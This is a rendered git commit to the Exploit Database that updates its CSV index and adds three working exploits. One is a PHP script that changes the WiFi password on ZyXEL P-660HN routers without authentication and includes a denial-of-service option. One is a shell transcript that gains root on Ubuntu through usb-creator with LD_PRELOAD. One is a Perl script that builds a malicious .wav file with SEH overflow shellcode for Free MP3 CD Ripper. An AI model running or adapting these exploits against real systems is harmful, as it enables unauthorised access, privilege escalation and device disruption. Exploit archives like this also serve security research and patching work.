DB: 2015-04-24
3 new exploits
This commit is contained in:
Offensive Security
parent
6ddbb48d4d
commit
93751b0d8e
4 changed files with 130 additions and 3 deletions
|
|
@ -26594,7 +26594,7 @@ id,file,description,date,author,platform,type,port
|
|||
29687,platforms/windows/remote/29687.py,"HyperBook Guestbook 1.3 GBConfiguration.DAT Hashed Password Information Disclosure Vulnerability",2007-02-28,PeTrO,windows,remote,0
|
||||
29544,platforms/php/webapps/29544.txt,"Juniper Junos J-Web - Privilege Escalation Vulnerability",2013-11-12,"Sense of Security",php,webapps,0
|
||||
29545,platforms/windows/dos/29545.rb,"Hanso Converter 2.4.0 - 'ogg' Buffer Overflow (DoS)",2013-11-12,"Necmettin COSKUN",windows,dos,0
|
||||
36816,platforms/php/webapps/36816.php,"Open-Letters Remote PHP Code Injection Vulnerability",2015-04-22,"TUNISIAN CYBER",php,webapps,80
|
||||
36816,platforms/php/webapps/36816.php,"Open-Letters - Remote PHP Code Injection Vulnerability",2015-04-22,"TUNISIAN CYBER",php,webapps,80
|
||||
29546,platforms/windows/dos/29546.rb,"Provj 5.1.5.8 - 'm3u' Buffer Overflow (PoC)",2013-11-12,"Necmettin COSKUN",windows,dos,0
|
||||
29548,platforms/windows/local/29548.rb,"VideoSpirit Lite 1.77 - (SEH) Buffer Overflow",2013-11-12,metacom,windows,local,0
|
||||
29549,platforms/windows/local/29549.pl,"ALLPlayer 5.6.2 - (.m3u) Local Buffer Overflow (SEH/Unicode)",2013-11-12,"Mike Czumak",windows,local,0
|
||||
|
|
@ -33218,5 +33218,8 @@ id,file,description,date,author,platform,type,port
|
|||
36813,platforms/hardware/local/36813.txt,"ADB Backup Archive Path Traversal File Overwrite",2015-04-21,"Imre Rad",hardware,local,0
|
||||
36814,platforms/osx/dos/36814.c,"Mac OS X Local Denial of Service",2015-04-21,"Maxime Villard",osx,dos,0
|
||||
36815,platforms/cfm/webapps/36815.txt,"BlueDragon CFChart Servlet 7.1.1.17759 - Arbitrary File Retrieval/Deletion",2015-04-21,Portcullis,cfm,webapps,80
|
||||
36818,platforms/php/webapps/36818.php,"Wolf CMS 0.8.2 Arbitrary File Upload Exploit",2015-04-22,"CWH Underground",php,webapps,80
|
||||
36819,platforms/windows/local/36819.pl,"MooPlayer 1.3.0 'm3u' SEH Buffer Overflow",2015-04-22,"Tomislav Paskalev",windows,local,0
|
||||
36818,platforms/php/webapps/36818.php,"Wolf CMS 0.8.2 - Arbitrary File Upload Exploit",2015-04-22,"CWH Underground",php,webapps,80
|
||||
36819,platforms/windows/local/36819.pl,"MooPlayer 1.3.0 - 'm3u' SEH Buffer Overflow",2015-04-22,"Tomislav Paskalev",windows,local,0
|
||||
36820,platforms/linux/local/36820.txt,"Ubuntu usb-creator 0.2.x - Local Privilege Escalation",2015-04-23,"Tavis Ormandy",linux,local,0
|
||||
36825,platforms/hardware/dos/36825.php,"ZYXEL P-660HN-T1H_IPv6 Remote Configuration Editor / Web Server DoS",2015-04-23,"Koorosh Ghorbani",hardware,dos,80
|
||||
36826,platforms/windows/local/36826.pl,"Free MP3 CD Ripper 2.6 2.8 (.wav) - SEH Based Buffer Overflow",2015-04-23,ThreatActor,windows,local,0
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
58
platforms/hardware/dos/36825.php
Executable file
58
platforms/hardware/dos/36825.php
Executable file
|
|
@ -0,0 +1,58 @@
|
|||
<?php
|
||||
/*
|
||||
Exploit Title : ZYXEL remote configuration editor / Web Server DoS
|
||||
Date : 23 April 2015
|
||||
Exploit Author : Koorosh Ghorbani
|
||||
Site : http://8thbit.net/
|
||||
Vendor Homepage : http://www.zyxel.com/
|
||||
Platform : Hardware
|
||||
Tested On : ZyXEL P-660HN-T1H_IPv6
|
||||
Firmware Version: 1.02(VLU.0)
|
||||
--------------------------
|
||||
Unattended remote access
|
||||
--------------------------
|
||||
ZYXEL Embedded Software does not check Cookies And Credentials on POST method so
|
||||
attackers could changes settings and view pages with post method .
|
||||
|
||||
--------------------------
|
||||
DoS Web Server
|
||||
--------------------------
|
||||
sending empty Post to admin pages will crash internal web server and router needs
|
||||
to hard reset .
|
||||
|
||||
*/
|
||||
$banner = " ___ _______ _ ____ _ _______ \r\n" . " / _ \__ __| | | _ \(_)__ __|\r\n" ." | (_) | | | | |__ | |_) |_ | | \r\n" ." > _ < | | | '_ \| _ <| | | | \r\n" ." | (_) | | | | | | | |_) | | | | \r\n" ." \___/ |_| |_| |_|____/|_| |_| \r\n" ." \r\n" ." \r\n";
|
||||
print $banner;
|
||||
function Post($packet,$host)
|
||||
{
|
||||
try {
|
||||
$curl = curl_init();
|
||||
curl_setopt($curl, CURLOPT_URL, $host);
|
||||
curl_setopt($curl, CURLOPT_POST, 1);
|
||||
curl_setopt($curl, CURLOPT_POSTFIELDS, $packet);
|
||||
curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0");
|
||||
curl_setopt($curl, CURLOPT_REFERER, "Referer: http://192.168.1.1/cgi-bin/WLAN_General.asp");
|
||||
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
|
||||
$result = curl_exec($curl);
|
||||
curl_close($curl);
|
||||
return $result;
|
||||
}catch (Exception $e ){
|
||||
echo $e->getMessage();
|
||||
return "" ;
|
||||
}
|
||||
}
|
||||
if(sizeof($argv) < 3) {
|
||||
print "Usage : $argv[0] 192.168.1.1 NewWifiPassword\n";
|
||||
exit(1);
|
||||
}
|
||||
$host = $argv[1];
|
||||
$password = urlencode($argv[2]);
|
||||
$packet= "access=0&DoScan=0&ChannelDoScan=0&WlanQosFlag=0&HtExtcha=0&IsPtGui=0&SecurityIndexOriginal=3&EnableWLAN=on&SSID_INDEX=0&EnableWLanFlag=1&CountryRegion=1&CountryRegion0=0&CountryRegion1=1&CountryRegion2=2&CountryRegion3=3&CountryRegion5=5&CountryRegion6=6&Countries_Channels=IRAN&Channel_ID=11&HideSsidFlag=0&WPACompatileFlag=WPA2PSK&EncrypType=TKIPAES&PreSecurity_Sel=WPA2PSK&Security_Sel=WPA2PSK&WLANCfgPphrase=&WEP_Key1=&DefWEPKey=1&WLANCfgPSK=$password&WLANCfgAuthenTimeout=1800&WLANCfgIdleTimeout=3600&WLANCfgWPATimer=1800&WLANCfgRadiusServerAddr=0.0.0.0&WLANCfgRadiusServerPort=1812&WLANCfgRadiusServerKey=&Qos_Sel=None&doSubmitFlag=0" ;
|
||||
$target = "http://$host/cgi-bin/WLAN_General.asp";
|
||||
if(strlen(Post($packet,$target)) > 0){
|
||||
print "Seems Changed !";
|
||||
}else{
|
||||
print "Humm , No Chance !";
|
||||
}
|
||||
//DoS : Post("",$target) ;
|
||||
?>
|
||||
23
platforms/linux/local/36820.txt
Executable file
23
platforms/linux/local/36820.txt
Executable file
|
|
@ -0,0 +1,23 @@
|
|||
Source: http://www.openwall.com/lists/oss-security/2015/04/22/12
|
||||
Bug report: https://bugs.launchpad.net/ubuntu/vivid/+source/usb-creator/+bug/1447396
|
||||
|
||||
Ubuntu Precise (12.04LTS) <= usb-creator: 0.2.38.3ubuntu (Patched in: 0.2.38.3ubuntu0.1)
|
||||
Ubuntu Trusty (14.04LTS) <= usb-creator 0.2.56.3ubuntu (Patched in: 0.2.56.3ubuntu0.1)
|
||||
Ubuntu Utopic (14.10) <= usb-creator 0.2.62ubuntu0.2 (Patched in: 0.2.62ubuntu0.3)
|
||||
|
||||
$ cat > test.c
|
||||
void __attribute__((constructor)) init (void)
|
||||
{
|
||||
chown("/tmp/test", 0, 0);
|
||||
chmod("/tmp/test", 04755);
|
||||
}
|
||||
^D
|
||||
$ gcc -shared -fPIC -o /tmp/test.so test.c
|
||||
$ cp /bin/sh /tmp/test
|
||||
$ dbus-send --print-reply --system --dest=com.ubuntu.USBCreator /com/ubuntu/USBCreator com.ubuntu.USBCreator.KVMTest string:/dev/sda dict:string:string:DISPLAY,"foo",XAUTHORITY,"foo",LD_PRELOAD,"/tmp/test.so"
|
||||
method return sender=:1.4364 -> dest=:1.7427 reply_serial=2
|
||||
$ ls -l /tmp/test
|
||||
-rwsr-xr-x 1 root root 121272 Apr 22 16:43 /tmp/test
|
||||
$ /tmp/test
|
||||
# id
|
||||
euid=0(root) groups=0(root)
|
||||
43
platforms/windows/local/36826.pl
Executable file
43
platforms/windows/local/36826.pl
Executable file
|
|
@ -0,0 +1,43 @@
|
|||
#!/usr/bin/env perl
|
||||
# original p0c https://www.exploit-db.com/exploits/36465/
|
||||
# credit to TUNISIAN CYBER
|
||||
# however he was attemping to vanilla buffer overflow
|
||||
# in fact it is SEH based exploit
|
||||
# using the address 0x7C9D30D7 is limit the targets
|
||||
#which I assume belongs to OS file didn't work on win7
|
||||
#yes he did find a buffer overflow since the offset reaches ESP before SEH
|
||||
#in this app, SEH based exploits are more effective and the main vuln in this case should be SEH
|
||||
#This p0c > win 7s & 8s
|
||||
# ThreatActor at CoreRed.com
|
||||
##
|
||||
|
||||
my $file = "p0c.wav";
|
||||
my $buff = "A" x 4116; # offset to SEH
|
||||
my $nseh = "\xeb\x06\xff\xff"; #dat 8 jmp
|
||||
my $seh = pack('V', 0x66E42A79); # 66E42A79 5E POP ESI ogg.dll
|
||||
my $nop = "\x90" x 28;
|
||||
|
||||
#msfvenom -p windows/exec CMD=calc.exe -f perl -b '\x00\xff\x0a\x0d'
|
||||
my $shell =
|
||||
"\xda\xcd\xd9\x74\x24\xf4\xb8\x50\x99\x22\x39\x5b\x33\xc9" .
|
||||
"\xb1\x31\x31\x43\x18\x83\xc3\x04\x03\x43\x44\x7b\xd7\xc5" .
|
||||
"\x8c\xf9\x18\x36\x4c\x9e\x91\xd3\x7d\x9e\xc6\x90\x2d\x2e" .
|
||||
"\x8c\xf5\xc1\xc5\xc0\xed\x52\xab\xcc\x02\xd3\x06\x2b\x2c" .
|
||||
"\xe4\x3b\x0f\x2f\x66\x46\x5c\x8f\x57\x89\x91\xce\x90\xf4" .
|
||||
"\x58\x82\x49\x72\xce\x33\xfe\xce\xd3\xb8\x4c\xde\x53\x5c" .
|
||||
"\x04\xe1\x72\xf3\x1f\xb8\x54\xf5\xcc\xb0\xdc\xed\x11\xfc" .
|
||||
"\x97\x86\xe1\x8a\x29\x4f\x38\x72\x85\xae\xf5\x81\xd7\xf7" .
|
||||
"\x31\x7a\xa2\x01\x42\x07\xb5\xd5\x39\xd3\x30\xce\x99\x90" .
|
||||
"\xe3\x2a\x18\x74\x75\xb8\x16\x31\xf1\xe6\x3a\xc4\xd6\x9c" .
|
||||
"\x46\x4d\xd9\x72\xcf\x15\xfe\x56\x94\xce\x9f\xcf\x70\xa0" .
|
||||
"\xa0\x10\xdb\x1d\x05\x5a\xf1\x4a\x34\x01\x9f\x8d\xca\x3f" .
|
||||
"\xed\x8e\xd4\x3f\x41\xe7\xe5\xb4\x0e\x70\xfa\x1e\x6b\x8e" .
|
||||
"\xb0\x03\xdd\x07\x1d\xd6\x5c\x4a\x9e\x0c\xa2\x73\x1d\xa5" .
|
||||
"\x5a\x80\x3d\xcc\x5f\xcc\xf9\x3c\x2d\x5d\x6c\x43\x82\x5e" .
|
||||
"\xa5\x20\x45\xcd\x25\x89\xe0\x75\xcf\xd5";
|
||||
|
||||
open($FILE,">$file");
|
||||
print $FILE $buff.$nseh.$seh.$nop.$shell;
|
||||
close($FILE);
|
||||
print "+++++++++++++++++++\n";
|
||||
|
||||
Loading…
Add table
Reference in a new issue